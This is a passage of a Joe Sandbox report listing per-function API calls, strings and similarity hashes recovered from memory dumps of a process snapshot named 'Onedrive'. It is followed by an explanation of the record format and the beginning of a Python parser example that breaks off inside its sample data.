                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: LocaleName
                                                    • String ID:
                                                    • API String ID: 1723996188-0
                                                    • Opcode ID: 90812c785ae45d4dbd0d637aedc98363c098c1fc638e0205df71d1a71fe8337e
                                                    • Instruction ID: dd002860621ce85fbbe4470ae01fc83404240d6fcbe5a24ab0b14bb0d05c4577
                                                    • Opcode Fuzzy Hash: 90812c785ae45d4dbd0d637aedc98363c098c1fc638e0205df71d1a71fe8337e
                                                    • Instruction Fuzzy Hash: 0FE1CD3260C781C6E764DB2AE4A462AB7E0F788744F114239E69E9B7ACDB3CD541DF04
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap$ProcessString
                                                    • String ID:
                                                    • API String ID: 457288585-0
                                                    • Opcode ID: b58d795c223e933af8178aaedf77eb8d46f6f4fa86935d1c62db7cd3e1f41b76
                                                    • Instruction ID: 6c019e4f07a906157e9e8d646584b95f9dec2a948851503bd68f70467f581641
                                                    • Opcode Fuzzy Hash: b58d795c223e933af8178aaedf77eb8d46f6f4fa86935d1c62db7cd3e1f41b76
                                                    • Instruction Fuzzy Hash: 2F91F461B18B8645ED109FAA99043B9A651AF75FE0F498231EE2D8B7C5DE3CF04D9310
                                                    APIs
                                                    • SysFreeString.OLEAUT32 ref: 00007FF63EA14748
                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF63EA14035,00000000,00000000,?,?,00000000,?,?,00007FF63EA13035), ref: 00007FF63EA14758
                                                    • HeapFree.KERNEL32(?,?,?,00007FF63EA14035,00000000,00000000,?,?,00000000,?,?,00007FF63EA13035), ref: 00007FF63EA1476C
                                                    • SysFreeString.OLEAUT32 ref: 00007FF63EA1478C
                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF63EA14035,00000000,00000000,?,?,00000000,?,?,00007FF63EA13035), ref: 00007FF63EA1479C
                                                    • HeapFree.KERNEL32(?,?,?,00007FF63EA14035,00000000,00000000,?,?,00000000,?,?,00007FF63EA13035), ref: 00007FF63EA147B0
                                                      • Part of subcall function 00007FF63EA12E94: CompareStringEx.KERNEL32 ref: 00007FF63EA12EC4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap$String$Process$Compare
                                                    • String ID:
                                                    • API String ID: 3197231773-0
                                                    • Opcode ID: 56f79bf90f11542464ed531c6df6cde9723808e7608c5b96574c2fd091f9801c
                                                    • Instruction ID: 315e4dd8f690d1eca27b123fa79f6d881247f1373f2ceec0c760a32797c40b5d
                                                    • Opcode Fuzzy Hash: 56f79bf90f11542464ed531c6df6cde9723808e7608c5b96574c2fd091f9801c
                                                    • Instruction Fuzzy Hash: 1A417E22A19A4196EE00DF96E4443F9A7A1FBA9BC5F4D8131EA0D8B355DF7CE10CD310
                                                    APIs
                                                    • ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70 ref: 00007FF63EA1B531
                                                    • ?Release@Value@DirectUI@@QEAAXXZ.DUI70 ref: 00007FF63EA1B544
                                                      • Part of subcall function 00007FF63EA1AF8C: ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF63EA1360B), ref: 00007FF63EA1AFB3
                                                      • Part of subcall function 00007FF63EA1AF8C: ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF63EA1360B), ref: 00007FF63EA1B05A
                                                      • Part of subcall function 00007FF63EA1BB50: StrToID.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB6B
                                                      • Part of subcall function 00007FF63EA1BB50: ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB7E
                                                      • Part of subcall function 00007FF63EA1BB50: ?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB96
                                                      • Part of subcall function 00007FF63EA1B6D8: ?GetSelection@TouchEdit2@DirectUI@@QEAAJPEAJ0@Z.DUI70(?,?,00000000,00007FF63EA1B9D1), ref: 00007FF63EA1B6F6
                                                    • towlower.MSVCRT ref: 00007FF63EA1B5E5
                                                    • towlower.MSVCRT ref: 00007FF63EA1B5F8
                                                    • ?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF63EA1B61D
                                                    • ?SetCaretPosition@TouchEdit2@DirectUI@@QEAAJJ@Z.DUI70 ref: 00007FF63EA1B62F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
• Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Direct$Element@String@$ContentValue@$Edit2@Release@TouchV12@Value@2@@memsettowlower$CaretCreateDescendent@E__@@@FindPosition@Selection@
                                                    • String ID:
                                                    • API String ID: 1728635042-0
                                                    • Opcode ID: f8185b381dd9cae6fd31baaa39e3e0ceb803fb853cf683b02eb1faf8e9495004
                                                    • Instruction ID: d34216883ff80384bc1d6fba69d7ca18dbb7d85b8de540951963b9c06d1869fa
                                                    • Opcode Fuzzy Hash: f8185b381dd9cae6fd31baaa39e3e0ceb803fb853cf683b02eb1faf8e9495004
                                                    • Instruction Fuzzy Hash: BA418332B04A52C6EB109BA6D4105BC77F0FBA8B95B854171EE0E97754DF38E449D350
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
• Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 4104442557-0
                                                    • Opcode ID: f3adc634d01244b8c552e817e92152aec10bd9510da74559573b3576420bdd9d
                                                    • Instruction ID: 603aff558ee588387b997dafcb457a9f74899d4f9682218c1284a75a4ad2313b
                                                    • Opcode Fuzzy Hash: f3adc634d01244b8c552e817e92152aec10bd9510da74559573b3576420bdd9d
                                                    • Instruction Fuzzy Hash: 8E113036A05F418AEB00DF72E8542A833A4FB78758F400A35FA6D87B94EF7CD5689350
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
• Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Frame$BlockEstablisherHandler3::StateUnwind$ControlFrom$EntryFunctionLookup
                                                    • String ID:
                                                    • API String ID: 523381305-0
                                                    • Opcode ID: 1c938a9c421dafcbaaf4c7f9a1c99e9a12375c26f6b421891ec9a4fd2c3daaf4
                                                    • Instruction ID: 228a1ef7e77b71fc2dd04054134023f79ddf4efff3cba774ce4566b455709232
                                                    • Opcode Fuzzy Hash: 1c938a9c421dafcbaaf4c7f9a1c99e9a12375c26f6b421891ec9a4fd2c3daaf4
                                                    • Instruction Fuzzy Hash: FD11BF76A18A8182C720DB56E0504AFBB70FBCAB94F601526EEDC57B6DCF6DD5008F40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
• Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: String__crt$Info
                                                    • String ID: $z
                                                    • API String ID: 2508956065-2251613814
                                                    • Opcode ID: a1bb79b3926ab07b511d83ff6639c85910dc0fd292b6cb2822028fa61ec3b579
                                                    • Instruction ID: d09a8a3ffaf857e2b90de34713e0ab682e3900d888012c3dcb8cb07530b27ccc
                                                    • Opcode Fuzzy Hash: a1bb79b3926ab07b511d83ff6639c85910dc0fd292b6cb2822028fa61ec3b579
                                                    • Instruction Fuzzy Hash: C8B1273260C6C08BD764CB59E0907AEFBA0F7C9754F444526EADA87B99CBACE444CF40
                                                    APIs
                                                    Strings
                                                    • %ls, xrefs: 00007FFDF3B00E4B
                                                    • minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp, xrefs: 00007FFDF3B00E60
                                                    • (ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat, xrefs: 00007FFDF3B00E3F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
• Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __free_lconv_mon__free_lconv_num
                                                    • String ID: %ls$(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat$minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp
                                                    • API String ID: 2148069796-164516335
                                                    • Opcode ID: f8c993c3ac616c137a0244c55a8ab641f86d32dc4a5abb803c8119df114f18a7
                                                    • Instruction ID: 9efef3c005775bb50eafd6a8c4b4fa5186d35528c68d8ed42d24c8731551a96d
                                                    • Opcode Fuzzy Hash: f8c993c3ac616c137a0244c55a8ab641f86d32dc4a5abb803c8119df114f18a7
                                                    • Instruction Fuzzy Hash: 0A914F22718A8581EB50CB46E0E577AB360F7D4B80F465136EA9E5BBE9CFBCD485C700
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
• Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: MOC$RCC
                                                    • API String ID: 0-2084237596
                                                    • Opcode ID: 59c54c8cb16b957d9b1ed07fc171562f92a7a927a343df4c3b5bb3759d843deb
                                                    • Instruction ID: 294647ea33c24de903f8fc4075b389db6f42e37ded52117514431398dfcabd87
                                                    • Opcode Fuzzy Hash: 59c54c8cb16b957d9b1ed07fc171562f92a7a927a343df4c3b5bb3759d843deb
                                                    • Instruction Fuzzy Hash: F891D732A08BC685E7709B16E4607EEB7A0FB88784F415036EA9D57BA9DF3CD544CB00
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00007FF63EA1DACF,?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1AB27
                                                    • HeapAlloc.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1AB3B
                                                    • memmove.MSVCRT(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1AB6F
                                                    • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1AB8E
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1ABA2
                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00007FF63EA1DACF,?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1ABCB
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1ABDF
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
• Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: dad896d2d793cc911e38404661b56dba7b395c6b74f73abf0410838d05515740
                                                    • Instruction ID: 330434f8f0a34e2470447d7e2d9bc303e9e5a08da557df013370e7b65dc32969
                                                    • Opcode Fuzzy Hash: dad896d2d793cc911e38404661b56dba7b395c6b74f73abf0410838d05515740
                                                    • Instruction Fuzzy Hash: 7451E8327086468AEA18AFA2A40407976D2FFB8780F498439FA4FD3341DE3DE44DA214
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
• Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: d52f1c5daf9b55119971937f55c72f90c6fe77c5cc7fbe569b2c6201aa31f2e0
                                                    • Instruction ID: 4bec0546c4616c514de89d32a4cd58f0da64aeb0ecf5cdb3dd9770872d2af485
                                                    • Opcode Fuzzy Hash: d52f1c5daf9b55119971937f55c72f90c6fe77c5cc7fbe569b2c6201aa31f2e0
                                                    • Instruction Fuzzy Hash: 31418532B0CB4287EA149F97A440279BAA1BFA4BD1F098034EE5E97754DF3CE44DD210
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
• Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_new[]
                                                    • String ID: minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
                                                    • API String ID: 3742145013-426720447
                                                    • Opcode ID: 60669bbcb90472b39e6566556282e0c1fef63ff969ffe470ccdd1451293b4045
                                                    • Instruction ID: 0e2d3f542c66707a21fe382088adb3d9a22b6d542f1e12c1758730fe10e64d80
                                                    • Opcode Fuzzy Hash: 60669bbcb90472b39e6566556282e0c1fef63ff969ffe470ccdd1451293b4045
                                                    • Instruction Fuzzy Hash: 1F51312270868186E760DB26E4A4AAE73A0FBC4754F414235E6AD9B7EDDF2CD504CB40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
• Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: dd59d9a7f5ff281a3a5ac38261a22c1cfc43348459e99cafb0c1c9f369091ba9
                                                    • Instruction ID: d5fae9b2795c1171301c66d11436bcf50416ce08c7dd72bb5bb3cf7bfe68296d
                                                    • Opcode Fuzzy Hash: dd59d9a7f5ff281a3a5ac38261a22c1cfc43348459e99cafb0c1c9f369091ba9
                                                    • Instruction Fuzzy Hash: F441A922B09783C7EA149F976540179A691BFB8BC2B098434EE5E97791DF3CF449A220
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16377
                                                    • HeapAlloc.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA1638B
                                                    • memmove.MSVCRT(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA163BC
                                                    • GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA163D2
                                                    • HeapFree.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA163E6
                                                    • GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16414
                                                    • HeapFree.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16428
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
• Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: e3ea0ae9526573e326e153ee29c05e8328531308f38c4549085912ce3cfad05f
                                                    • Instruction ID: 1866bd10066ae9a63f198fc139ad207867221485ae0c9e64a6c0db5b9347c843
                                                    • Opcode Fuzzy Hash: e3ea0ae9526573e326e153ee29c05e8328531308f38c4549085912ce3cfad05f
                                                    • Instruction Fuzzy Hash: 24319322F08B5687EA059F96A54407DBAA1FFE9BC1B0A8034EE0DC3344DF3CD449A260
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
• Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: e712f9ac12633a78c19ab5ec0b286bbeba9ad5bbc8c49b7ef324b6a63908fe2e
                                                    • Instruction ID: 307be897010465c79163230f5af2e175f35eb380cce1d5924434fbab43c0be4c
                                                    • Opcode Fuzzy Hash: e712f9ac12633a78c19ab5ec0b286bbeba9ad5bbc8c49b7ef324b6a63908fe2e
                                                    • Instruction Fuzzy Hash: 20318626B0975687EA15AFD76544079BAD1FFF9BC1B0A8034EE0D87345DF3CE44AA220
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA196BF
                                                    • HeapAlloc.KERNEL32(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA196D3
                                                    • memmove.MSVCRT(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA19700
                                                    • GetProcessHeap.KERNEL32(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA19716
                                                    • HeapFree.KERNEL32(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA1972A
                                                    • GetProcessHeap.KERNEL32(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA19758
                                                    • HeapFree.KERNEL32(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA1976C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
• Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: c9fe35422332f408aca34dfc3986990ec640009ac1058576df87ad1f4ad7d076
                                                    • Instruction ID: 6e7d999d231bf0ebc6d2f5b7755739535d2d1eaa6c5c55d1881df59525d39fd4
                                                    • Opcode Fuzzy Hash: c9fe35422332f408aca34dfc3986990ec640009ac1058576df87ad1f4ad7d076
                                                    • Instruction Fuzzy Hash: 1B319436B0975287EA15AFD76544079AA91BFA9BC1B0E8034EE1E87345DF3CE409E220
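The records above are Joe Sandbox's per-function summaries: each lists the Win32 and CRT calls a recovered function makes (with the address of each call site), the memory dump and module base it was lifted from, any strings it references, and similarity keys (API ID, API String ID, Opcode ID, Instruction ID, Instruction Fuzzy Hash). Several records in this stretch share API String ID 3442027419-0, the GetProcessHeap / HeapAlloc / memmove / GetProcessHeap / HeapFree pattern, inside the module based at 00007FF63EA10000 (the `Onedrive` snapshot). The Python parser below is an added example, not part of the Joe Sandbox report or its tooling: it reads records in this layout, keeps the direct API sequence in call-site order, and groups records by API String ID and by module base so repeated function bodies and their origin can be read off directly. The excerpt it runs on is constructed here from three abridged records on this page (hashes, addresses and API names copied; the third record's String ID shortened).

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Memory Dump Source /
Similarity blocks) and group them by similarity key and module."""
import re
from collections import defaultdict

# Constructed excerpt: three abridged records in the report's own layout.
# Values are copied from records on this page; the excerpt itself is assembled
# for this example and is not the original report text.
SAMPLE = """\
APIs
• GetProcessHeap.KERNEL32(00000000,?,00000000,00007FF63EA1DACF), ref: 00007FF63EA1AB27
• HeapAlloc.KERNEL32(?,?,?,00000000), ref: 00007FF63EA1AB3B
• memmove.MSVCRT(?,?,?,00000000), ref: 00007FF63EA1AB6F
• GetProcessHeap.KERNEL32(?,?,?,00000000), ref: 00007FF63EA1AB8E
• HeapFree.KERNEL32(?,?,?,00000000), ref: 00007FF63EA1ABA2
Memory Dump Source
• Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
• Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
Similarity
• API ID: Heap$Process$Free$Allocmemmove
• String ID:
• API String ID: 3442027419-0
• Opcode ID: dad896d2d793cc911e38404661b56dba7b395c6b74f73abf0410838d05515740
• Instruction Fuzzy Hash: 7451E8327086468AEA18AFA2A40407976D2FFB8780F498439FA4FD3341DE3DE44DA214
APIs
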